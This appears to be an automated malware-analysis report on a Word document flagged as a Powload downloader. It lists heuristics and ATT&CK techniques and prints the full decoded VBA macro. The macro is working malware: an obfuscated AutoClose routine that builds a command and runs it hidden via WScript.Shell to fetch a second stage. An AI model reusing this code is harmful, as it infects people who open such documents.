MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is an Office document containing VBA macros. The AutoClose macro is present and uses WScript.Shell to execute a command. The script appears to download and execute a second-stage payload, as indicated by the ClamAV detection 'Doc.Downloader.Powload-6707242-0'. The obfuscated nature of the script and the lack of specific URLs prevent a more precise family attribution.
Heuristics 7
-
ClamAV: Doc.Downloader.Powload-6707242-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6707242-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
If reoffense - overexpectation > 1 Then CreateObject("WScript.Shell").Run aquavit, 0 azyme = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
If reoffense - overexpectation > 1 Then CreateObject("WScript.Shell").Run aquavit, 0 azyme = False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() nonadvertence = Array("r", "R", "U", "y", "s", "O", "Q", "Z", "Q", "p", "U", "y", "y", "j", "J", "E", "E", "x", "i", "K", "r", "s", "R", "c", "a", "K", "i", "Y", "s", "c", "a", "Q", "c", "s", "U", "s", "b", "B", "O", "b", "i", "r", "E", "0", "n", "u", "E", "y", "Q", "K", "Z", "O", "j", "U", "j", "4", "g", "y", "r", "s", "I", "y", "K", "g", "r", "2") -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2148 bytes |
SHA-256: 7441f6bf1775058b629f83f77d0c97a87b954fd8cc9f527d98482d6c3d5ee28a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function corkscrewed(nonadvertence)
undecidedness = Array("I", "U", "J", "b", "Y", "y", "0", "r", "p", "Q", "B", "s", "x", "Z", "c", "K", "u", "O", "2", "j", "g", "i", "4", "E", "n", "a", "R")
vaisya = Array("=", "h", ":", "c", "v", "t", "I", "m", " ", "e", "b", "a", "f", "x", "n", "r", "O", ".", "d", "p", "u", "o", "?", "/", "S", "i", "s")
squawroot = vbNullString
For Each gumshoeing In nonadvertence
adoptive = midwinter(gumshoeing, undecidedness, UBound(undecidedness))
If adoptive > -1 Then
squawroot = vaisya(adoptive) & squawroot
End If
Next
corkscrewed = StrReverse(squawroot)
End Function
Public Function midwinter(zanclidae, hawkings, hemoglobinometer)
macrosplanchnic = 3
municipal = 1992
For macrosplanchnic = 0 To hemoglobinometer
If hawkings(macrosplanchnic) = zanclidae Then
municipal = macrosplanchnic
End If
Next
If municipal = 1992 Then
municipal = -1
End If
midwinter = municipal
End Function
Sub AutoClose()
nonadvertence = Array("r", "R", "U", "y", "s", "O", "Q", "Z", "Q", "p", "U", "y", "y", "j", "J", "E", "E", "x", "i", "K", "r", "s", "R", "c", "a", "K", "i", "Y", "s", "c", "a", "Q", "c", "s", "U", "s", "b", "B", "O", "b", "i", "r", "E", "0", "n", "u", "E", "y", "Q", "K", "Z", "O", "j", "U", "j", "4", "g", "y", "r", "s", "I", "y", "K", "g", "r", "2")
ovariosteresis = corkscrewed(nonadvertence)
Application.Run "stalagmitically", ovariosteresis
End Sub
Private Sub stalagmitically(aquavit)
overexpectation = DateDiff("s", #1/1/1970#, Now())
azyme = True
While azyme
reoffense = overexpectation + 60
If reoffense - overexpectation > 1 Then
CreateObject("WScript.Shell").Run aquavit, 0
azyme = False
End If
Wend
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes |
SHA-256: 0dedcaac6304169b8abf2a3b4d3fe56cf643f23bf02d1666b20f40c1562506a8 |
|||
|
Detection
ClamAV:
Doc.Downloader.Powload-6707242-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.